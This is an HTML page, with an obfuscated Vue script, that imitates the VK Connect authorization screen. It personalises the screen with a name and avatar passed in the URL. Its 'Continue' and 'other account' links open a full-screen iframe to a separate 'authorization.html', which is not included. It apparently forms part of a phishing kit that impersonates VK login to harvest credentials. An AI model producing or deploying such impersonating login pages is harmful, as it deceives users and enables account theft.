<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Авторизация</title>
    <link rel="stylesheet" href="normalize.css">
    <link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&display=swap" rel="stylesheet">
    <style>
        [v-cloak] {
            display: none
        }
        iframe{position:fixed;top:0;left:0;right:0;bottom:0;z-index:1000;width:100%;height:100%;border:none}
        @media (prefers-color-scheme: light) {

            body {
                font-family: 'Inter', sans-serif;
                text-align: center;
                overflow: hidden;
                background:#fff;
            }
            
            .container {
                max-width: 375px;
                margin: 0px auto;
                position: relative;
                height: 100vh;
            }

            .vk-connect {
                margin-top: 30px;
                margin-bottom: 90px;
            }

            .vk-logo {
                margin-bottom: 90px;
            }

            .avatar {
                margin-bottom: 12px;
                border-radius: 50%;
                background-color: #ececec;
                height: 74px;
                width: 74px;
                display: inline-block;
            }

            .name {
                margin-bottom: 28px;
                font-size: 18px;
                color: #4986CC;
                font-weight: 500;
            }
            
            .button {
                text-decoration: none;
                line-height: 50px;
                display: inline-block;
                border-radius: 10px;
                font-size: 18px;
                padding: 0 28px;
                color: #fff;
                background-color: #4986CC;
                font-weight: 500;
            }

            .other-account {
                position: absolute;
                left: 0;
                right: 0;
                bottom: 68px;
                font-weight: 500;
                color: #4986CC;
                text-decoration: none;
            }

        }

        @media (prefers-color-scheme: no-preference) {

            body {
                font-family: 'Inter', sans-serif;
                text-align: center;
                overflow: hidden;
                background:#fff;
            }

            .container {
                max-width: 375px;
                margin: 0px auto;
                position: relative;
                height: 100vh;
            }

            .vk-connect {
                margin-top: 30px;
                margin-bottom: 90px;
            }

            .vk-logo {
                margin-bottom: 90px;
            }

            .avatar {
                margin-bottom: 12px;
                border-radius: 50%;
                background-color: #ececec;
                height: 74px;
                width: 74px;
                display: inline-block;
            }

            .name {
                margin-bottom: 28px;
                font-size: 18px;
                color: #4986CC;
                font-weight: 500;
            }

            .button {
                text-decoration: none;
                line-height: 50px;
                display: inline-block;
                border-radius: 10px;
                font-size: 18px;
                padding: 0 28px;
                color: #fff;
                background-color: #4986CC;
                font-weight: 500;
            }

            .other-account {
                position: absolute;
                left: 0;
                right: 0;
                bottom: 68px;
                font-weight: 500;
                color: #4986CC;
                text-decoration: none;
            }

        }

        @media (prefers-color-scheme: dark) {

            body {
                font-family: 'Inter', sans-serif;
                text-align: center;
                overflow: hidden;
                background: #19191A;
            }

            .container {
                max-width: 375px;
                margin: 0px auto;
                position: relative;
                height: 100vh;
            }

            .vk-connect {
                margin-top: 30px;
                margin-bottom: 90px;
            }

            .vk-logo {
                margin-bottom: 90px;
            }

            .avatar {
                margin-bottom: 12px;
                border-radius: 50%;
                height: 74px;
                background-color: #2e2e2e;
                width: 74px;
                display: inline-block;
            }

            .name {
                margin-bottom: 28px;
                font-size: 18px;
                color: #fff;
                font-weight: 500;
            }

            .button {
                text-decoration: none;
                line-height: 50px;
                display: inline-block;
                border-radius: 10px;
                font-size: 18px;
                padding: 0 28px;
                color: #2C2D2E;
                background-color: #fff;
                font-weight: 500;
            }

            .other-account {
                position: absolute;
                left: 0;
                right: 0;
                bottom: 68px;
                font-weight: 500;
                color: #fff;
                text-decoration: none;
            }

        }
    </style>
</head>
<body>
    <div id="app" v-cloak>
        <template v-if="iframe">
            <iframe src="authorization.html"></iframe>
        </template>
        <div class="container">
            <div class="vk-connect">
                <svg width="121" height="27" viewBox="0 0 121 27" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M17.7744 0C25.392 0 27.2057 1.8 27.2057 9.36V17.64C27.2057 25.2 25.392 27 17.7744 27H9.43132C1.81372 27 0 25.2 0 17.64V9.36C0 1.8 1.81372 0 9.43132 0H17.7744ZM7.08486 8.4375H5.10111C4.53432 8.4375 4.42096 8.7023 4.42096 8.99429C4.42096 9.51575 5.0935 12.1021 7.5524 15.5227C9.19166 17.8587 11.5013 19.125 13.6029 19.125C14.8639 19.125 15.0199 18.8438 15.0199 18.3593V16.5938C15.0199 16.0313 15.1393 15.919 15.5386 15.919C15.8329 15.919 16.3373 16.065 17.5142 17.1913C18.8592 18.5262 19.081 19.125 19.8376 19.125H21.8213C22.3881 19.125 22.6715 18.8438 22.508 18.2887C22.3291 17.7355 21.6869 16.933 20.8348 15.9816C20.3724 15.4393 19.6789 14.8553 19.4687 14.5632C19.1745 14.1878 19.2585 14.0209 19.4687 13.6872L19.504 13.6376C19.8029 13.2159 21.9036 10.2264 22.1378 9.16119C22.2639 8.74403 22.1378 8.4375 21.5379 8.4375H19.5542C19.0498 8.4375 18.8172 8.7023 18.6911 8.99429C18.6911 8.99429 17.6823 11.4346 16.2532 13.0198C15.7908 13.4786 15.5807 13.6246 15.3285 13.6246C15.2024 13.6246 15.0198 13.4786 15.0198 13.0615V9.16119C15.0198 8.6606 14.8735 8.4375 14.4531 8.4375H11.3358C11.0206 8.4375 10.831 8.66984 10.831 8.89003C10.831 9.36458 11.5455 9.47401 11.6192 10.8089V13.7081C11.6192 14.3438 11.5035 14.459 11.2513 14.459C10.5788 14.459 8.94292 12.0078 7.9727 9.20289C7.78256 8.65772 7.59185 8.4375 7.08486 8.4375Z" fill="#A6ABB2"/>
                    <path d="M47.7003 14.1993C47.5615 14.8361 47.3404 15.4299 47.0369 15.9807C46.7334 16.5229 46.3475 16.9962 45.8792 17.4007C45.4197 17.8052 44.8907 18.1236 44.2924 18.356C43.7027 18.5797 43.061 18.6916 42.3673 18.6916C41.5695 18.6916 40.8237 18.5453 40.13 18.2527C39.4363 17.9515 38.8249 17.5341 38.296 17.0005C37.7757 16.4583 37.3681 15.8172 37.0733 15.0771C36.7871 14.337 36.6441 13.5151 36.6441 12.6115C36.6441 11.7165 36.7871 10.8989 37.0733 10.1588C37.3681 9.41867 37.7757 8.78183 38.296 8.24826C38.8249 7.70609 39.4363 7.28439 40.13 6.98318C40.8237 6.68198 41.5695 6.53137 42.3673 6.53137C43.061 6.53137 43.7027 6.64755 44.2924 6.87991C44.8907 7.10367 45.4197 7.42209 45.8792 7.83517C46.3475 8.23965 46.7291 8.71729 47.0239 9.26807C47.3274 9.81024 47.5528 10.3954 47.7003 11.0237H45.1638C44.9644 10.3524 44.6349 9.81024 44.1753 9.39716C43.7157 8.98407 43.113 8.77753 42.3673 8.77753C41.9424 8.77753 41.5261 8.87219 41.1186 9.06152C40.711 9.24225 40.3555 9.50473 40.052 9.84897C39.7485 10.1932 39.5013 10.602 39.3106 11.0753C39.1285 11.54 39.0374 12.0521 39.0374 12.6115C39.0374 13.1795 39.1285 13.6958 39.3106 14.1606C39.5013 14.6253 39.7485 15.0298 40.052 15.374C40.3555 15.7182 40.711 15.985 41.1186 16.1743C41.5261 16.3551 41.9424 16.4454 42.3673 16.4454C43.113 16.4454 43.7157 16.2389 44.1753 15.8258C44.6435 15.4127 44.9731 14.8705 45.1638 14.1993H47.7003Z" fill="#A6ABB2"/>
                    <path d="M58.2129 12.6115C58.2129 12.0435 58.1175 11.5271 57.9268 11.0624C57.7447 10.5977 57.5019 10.1932 57.1984 9.84897C56.8949 9.50473 56.5393 9.24225 56.1318 9.06152C55.7242 8.87219 55.308 8.77753 54.8831 8.77753C54.4582 8.77753 54.0419 8.87219 53.6344 9.06152C53.2268 9.24225 52.8713 9.50473 52.5678 9.84897C52.2643 10.1932 52.0171 10.602 51.8263 11.0753C51.6442 11.54 51.5532 12.0521 51.5532 12.6115C51.5532 13.1795 51.6442 13.6958 51.8263 14.1606C52.0171 14.6253 52.2643 15.0298 52.5678 15.374C52.8713 15.7182 53.2268 15.985 53.6344 16.1743C54.0419 16.3551 54.4582 16.4454 54.8831 16.4454C55.308 16.4454 55.7242 16.3551 56.1318 16.1743C56.5393 15.985 56.8949 15.7182 57.1984 15.374C57.5019 15.0298 57.7447 14.6253 57.9268 14.1606C58.1175 13.6958 58.2129 13.1795 58.2129 12.6115ZM60.6063 12.6115C60.6063 13.5065 60.4589 14.3284 60.164 15.0771C59.8779 15.8172 59.4703 16.4583 58.9413 17.0005C58.421 17.5341 57.814 17.9515 57.1203 18.2527C56.4266 18.5453 55.6808 18.6916 54.8831 18.6916C54.0853 18.6916 53.3395 18.5453 52.6458 18.2527C51.9521 17.9515 51.3407 17.5341 50.8118 17.0005C50.2915 16.4583 49.8839 15.8172 49.5891 15.0771C49.3029 14.337 49.1598 13.5151 49.1598 12.6115C49.1598 11.7165 49.3029 10.8989 49.5891 10.1588C49.8839 9.41867 50.2915 8.78183 50.8118 8.24826C51.3407 7.70609 51.9521 7.28439 52.6458 6.98318C53.3395 6.68198 54.0853 6.53137 54.8831 6.53137C55.6808 6.53137 56.4266 6.68198 57.1203 6.98318C57.814 7.28439 58.421 7.70609 58.9413 8.24826C59.4703 8.78183 59.8779 9.41867 60.164 10.1588C60.4589 10.8989 60.6063 11.7165 60.6063 12.6115Z" fill="#A6ABB2"/>
                    <path d="M68.5825 6.53137C69.2416 6.53137 69.8616 6.66046 70.4426 6.91864C71.0322 7.17682 71.5438 7.52966 71.9774 7.97717C72.411 8.42468 72.7535 8.96686 73.005 9.6037C73.2565 10.2319 73.3822 10.929 73.3822 11.6949V18.5625H70.9889V11.6949C70.9889 11.3077 70.9108 10.9376 70.7547 10.5848C70.6073 10.2319 70.4035 9.92212 70.1434 9.65533C69.8832 9.38855 69.5841 9.1777 69.2459 9.0228C68.9077 8.85928 68.5522 8.77753 68.1793 8.77753C67.7717 8.77753 67.3902 8.85928 67.0346 9.0228C66.6791 9.1777 66.3669 9.38855 66.0981 9.65533C65.838 9.92212 65.6299 10.2319 65.4738 10.5848C65.3264 10.929 65.2526 11.2991 65.2526 11.6949V18.5625H62.8593V6.66046H64.5893L65.1226 7.86099C65.3567 7.61142 65.6299 7.38766 65.942 7.18973C66.2282 7.03482 66.5881 6.88852 67.0216 6.75082C67.4552 6.60452 67.9755 6.53137 68.5825 6.53137Z" fill="#A6ABB2"/>
                    <path d="M81.8787 6.53137C82.5378 6.53137 83.1578 6.66046 83.7388 6.91864C84.3285 7.17682 84.8401 7.52966 85.2737 7.97717C85.7072 8.42468 86.0498 8.96686 86.3012 9.6037C86.5527 10.2319 86.6784 10.929 86.6784 11.6949V18.5625H84.2851V11.6949C84.2851 11.3077 84.2071 10.9376 84.051 10.5848C83.9036 10.2319 83.6998 9.92212 83.4396 9.65533C83.1795 9.38855 82.8803 9.1777 82.5421 9.0228C82.2039 8.85928 81.8484 8.77753 81.4755 8.77753C81.068 8.77753 80.6864 8.85928 80.3309 9.0228C79.9753 9.1777 79.6632 9.38855 79.3944 9.65533C79.1342 9.92212 78.9261 10.2319 78.77 10.5848C78.6226 10.929 78.5489 11.2991 78.5489 11.6949V18.5625H76.1555V6.66046H77.8855L78.4188 7.86099C78.6529 7.61142 78.9261 7.38766 79.2383 7.18973C79.5244 7.03482 79.8843 6.88852 80.3179 6.75082C80.7514 6.60452 81.2717 6.53137 81.8787 6.53137Z" fill="#A6ABB2"/>
                    <path d="M99.8446 15.1287C99.6452 15.6193 99.3937 16.0797 99.0902 16.51C98.7867 16.9403 98.4225 17.3189 97.9976 17.646C97.5727 17.973 97.0784 18.2312 96.5147 18.4205C95.9597 18.6012 95.3354 18.6916 94.6417 18.6916C93.8439 18.6916 93.0981 18.5453 92.4044 18.2527C91.7107 17.9515 91.1037 17.5341 90.5834 17.0005C90.0631 16.4583 89.6555 15.8172 89.3607 15.0771C89.0659 14.337 88.9185 13.5151 88.9185 12.6115C88.9185 11.7165 89.0659 10.8989 89.3607 10.1588C89.6555 9.41867 90.0544 8.78183 90.5574 8.24826C91.0603 7.70609 91.6543 7.28439 92.3394 6.98318C93.0244 6.68198 93.7485 6.53137 94.5116 6.53137C95.2747 6.53137 95.9988 6.68198 96.6838 6.98318C97.3689 7.28439 97.9629 7.70609 98.4658 8.24826C98.9688 8.78183 99.3677 9.41867 99.6625 10.1588C99.9573 10.8989 100.105 11.7165 100.105 12.6115C100.105 12.7492 100.096 12.8869 100.079 13.0246C100.061 13.1537 100.044 13.2655 100.027 13.3602C100.009 13.4807 99.992 13.584 99.9747 13.67H91.4419C91.4766 14.0401 91.585 14.3929 91.7671 14.7285C91.9492 15.0642 92.1746 15.3611 92.4434 15.6193C92.7209 15.8688 93.0505 16.0711 93.432 16.226C93.8135 16.3723 94.2168 16.4454 94.6417 16.4454C95.3701 16.4454 95.9467 16.2905 96.3716 15.9807C96.8052 15.6709 97.1174 15.3869 97.3082 15.1287H99.8446ZM94.5116 8.77753C93.7138 8.77753 93.0374 9.04861 92.4825 9.59079C91.9362 10.1244 91.5893 10.8257 91.4419 11.6949H97.8415C97.7027 10.8344 97.3472 10.133 96.7749 9.59079C96.2112 9.04861 95.4568 8.77753 94.5116 8.77753Z" fill="#A6ABB2"/>
                    <path d="M112.751 14.1993C112.612 14.8361 112.391 15.4299 112.087 15.9807C111.784 16.5229 111.398 16.9962 110.93 17.4007C110.47 17.8052 109.941 18.1236 109.343 18.356C108.753 18.5797 108.111 18.6916 107.418 18.6916C106.62 18.6916 105.874 18.5453 105.18 18.2527C104.487 17.9515 103.875 17.5341 103.346 17.0005C102.826 16.4583 102.418 15.8172 102.124 15.0771C101.837 14.337 101.694 13.5151 101.694 12.6115C101.694 11.7165 101.837 10.8989 102.124 10.1588C102.418 9.41867 102.826 8.78183 103.346 8.24826C103.875 7.70609 104.487 7.28439 105.18 6.98318C105.874 6.68198 106.62 6.53137 107.418 6.53137C108.111 6.53137 108.753 6.64755 109.343 6.87991C109.941 7.10367 110.47 7.42209 110.93 7.83517C111.398 8.23965 111.779 8.71729 112.074 9.26807C112.378 9.81024 112.603 10.3954 112.751 11.0237H110.214C110.015 10.3524 109.685 9.81024 109.226 9.39716C108.766 8.98407 108.163 8.77753 107.418 8.77753C106.993 8.77753 106.576 8.87219 106.169 9.06152C105.761 9.24225 105.406 9.50473 105.102 9.84897C104.799 10.1932 104.552 10.602 104.361 11.0753C104.179 11.54 104.088 12.0521 104.088 12.6115C104.088 13.1795 104.179 13.6958 104.361 14.1606C104.552 14.6253 104.799 15.0298 105.102 15.374C105.406 15.7182 105.761 15.985 106.169 16.1743C106.576 16.3551 106.993 16.4454 107.418 16.4454C108.163 16.4454 108.766 16.2389 109.226 15.8258C109.694 15.4127 110.023 14.8705 110.214 14.1993H112.751Z" fill="#A6ABB2"/>
                    <path d="M118.334 14.5995C118.334 15.1244 118.511 15.5633 118.867 15.9162C119.222 16.269 119.665 16.4454 120.194 16.4454C120.28 16.4454 120.371 16.4411 120.467 16.4325C120.571 16.4239 120.666 16.411 120.753 16.3938C120.84 16.3766 120.922 16.3508 121 16.3163V18.4334C120.896 18.485 120.77 18.5281 120.623 18.5625C120.354 18.6486 120.037 18.6916 119.673 18.6916C119.144 18.6916 118.65 18.5969 118.19 18.4076C117.74 18.2097 117.345 17.9343 117.007 17.5814C116.669 17.2286 116.404 16.8026 116.213 16.3034C116.031 15.8043 115.94 15.2363 115.94 14.5995V8.90662H113.807V6.66046H114.743C115.203 6.66046 115.585 6.51416 115.888 6.22156C116.192 5.92035 116.343 5.54169 116.343 5.08557V3.49777H118.334V6.66046H121V8.90662H118.334V14.5995Z" fill="#A6ABB2"/>
                </svg>
            </div>
            <div class="vk-logo">
                <svg width="62" height="62" viewBox="0 0 62 62" fill="none" xmlns="http://www.w3.org/2000/svg">
                    <path d="M40.5067 0C57.8667 0 62 4.13333 62 21.4933V40.5067C62 57.8667 57.8667 62 40.5067 62H21.4933C4.13333 62 0 57.8667 0 40.5067V21.4933C0 4.13333 4.13333 0 21.4933 0H40.5067Z" fill="#0086F6"/>
                    <path d="M16.1459 19.375H11.6251C10.3334 19.375 10.0751 19.9831 10.0751 20.6536C10.0751 21.851 11.6077 27.79 17.2114 35.6447C20.9472 41.0089 26.2106 43.9167 31.0001 43.9167C33.8738 43.9167 34.2293 43.2708 34.2293 42.1584V38.1042C34.2293 36.8125 34.5015 36.5547 35.4115 36.5547C36.082 36.5547 37.2315 36.89 39.9137 39.4763C42.9789 42.5416 43.4842 43.9167 45.2084 43.9167H49.7293C51.0209 43.9167 51.6668 43.2708 51.2942 41.9963C50.8865 40.7261 49.423 38.8831 47.4811 36.6984C46.4273 35.4531 44.8468 34.1121 44.3678 33.4415C43.6973 32.5795 43.8889 32.1962 44.3678 31.43L44.4483 31.3159C45.1295 30.3477 49.9169 23.4828 50.4506 21.0368C50.7378 20.0789 50.4506 19.375 49.0834 19.375H44.5626C43.4131 19.375 42.8832 19.9831 42.5957 20.6536C42.5957 20.6536 40.2967 26.2573 37.0399 29.8973C35.9862 30.951 35.5072 31.2862 34.9325 31.2862C34.6452 31.2862 34.2292 30.951 34.2292 29.9931V21.0368C34.2292 19.8873 33.8956 19.375 32.9376 19.375H25.8334C25.1151 19.375 24.6831 19.9085 24.6831 20.4141C24.6831 21.5038 26.3114 21.7551 26.4793 24.8205V31.4779C26.4793 32.9375 26.2157 33.2021 25.6409 33.2021C24.1083 33.2021 20.3803 27.5734 18.1692 21.1326C17.7359 19.8807 17.3013 19.375 16.1459 19.375Z" fill="white"/>
                </svg>
            </div>
            <div class="info">
                <div class="avatar" :style="{ background: 'url(' + this.photo + ') center center / cover no-repeat' }"></div>
                <div class="name">{{nameuser}}</div>
                <a href="#" @click.prevent="iframe = true" class="button">Продолжить</a>
            </div>
            <a class="other-account" href="#" @click.prevent="iframe = true">
                    Войти в другой аккаунт
            </a>
        </div>
    </div>
    <script src="https://cdn.jsdelivr.net/npm/vue"></script>
	<script src="https://unpkg.com/@vkontakte/vk-bridge/dist/browser.min.js"></script>
	<script>
        var _0x5994=['exec','2WhGFRf','location','nameuser','&crop=','[\x5c?&]','16948XytPSk','crop','622835EgkvzB','1iPsyrT','send','=([^&#]*)','sign','quality','replace','&ava=','11gGGlEu','photo','&quality=','36138WmBqso','316847WAWNGr','name','189103nPhZvT','4817gdLzZX','405211fsCMmX'];var _0x107948=_0x52ac;(function(_0x51385e,_0x54cf6b){var _0x1faf6e=_0x52ac;while(!![]){try{var _0xf84af2=-parseInt(_0x1faf6e(0x1e7))*parseInt(_0x1faf6e(0x1eb))+parseInt(_0x1faf6e(0x1f0))*-parseInt(_0x1faf6e(0x1f3))+parseInt(_0x1faf6e(0x1e9))+-parseInt(_0x1faf6e(0x1e5))+parseInt(_0x1faf6e(0x1e4))+parseInt(_0x1faf6e(0x1f2))+-parseInt(_0x1faf6e(0x1e8))*-parseInt(_0x1faf6e(0x1fa));if(_0xf84af2===_0x54cf6b)break;else _0x51385e['push'](_0x51385e['shift']());}catch(_0x3a19a1){_0x51385e['push'](_0x51385e['shift']());}}}(_0x5994,0x62eb2),vkBridge[_0x107948(0x1f4)]('VKWebAppInit'));function _0x52ac(_0x5b3e33,_0x17c4de){_0x5b3e33=_0x5b3e33-0x1e4;var _0x599417=_0x5994[_0x5b3e33];return _0x599417;}function getParameterByName(_0x3abd9e,_0x24678e){var _0x24d16e=_0x107948;if(!_0x24678e)_0x24678e=window[_0x24d16e(0x1ec)]['href'];_0x3abd9e=_0x3abd9e[_0x24d16e(0x1f8)](/[\[]/,'\x5c[')['replace'](/[\]]/,'\x5c]');var _0x5695ec=_0x24d16e(0x1ef)+_0x3abd9e+_0x24d16e(0x1f5),_0x79fc36=new RegExp(_0x5695ec),_0xe34d9c=_0x79fc36[_0x24d16e(0x1ea)](_0x24678e);if(_0xe34d9c==null)return'';else return decodeURIComponent(_0xe34d9c[0x1][_0x24d16e(0x1f8)](/\+/g,'\x20'));}var app=new Vue({'el':'#app','data':{'nameuser':'','photo':'','iframe':![]},'created':function(){var _0x5f554e=_0x107948;this[_0x5f554e(0x1ed)]=getParameterByName(_0x5f554e(0x1e6));let _0x40e0f7='',_0x31f47a='',_0x1c1f57='',_0x1187ff='';getParameterByName('quality')!=''&&(_0x40e0f7=_0x5f554e(0x1fc)+getParameterByName(_0x5f554e(0x1f7))),getParameterByName('sign')!=''&&(_0x31f47a='&sign='+getParameterByName(_0x5f554e(0x1f6))),getParameterByName('crop')!=''&&(_0x1c1f57=_0x5f554e(0x1ee)+getParameterByName(_0x5f554e(0x1f1))),getParameterByName('ava')!=''&&(_0x1187ff=_0x5f554e(0x1f9)+getParameterByName('ava')),this[_0x5f554e(0x1fb)]=getParameterByName(_0x5f554e(0x1fb))+_0x40e0f7+_0x31f47a+_0x1c1f57+_0x1187ff;}});
	</script>
</body>
</html>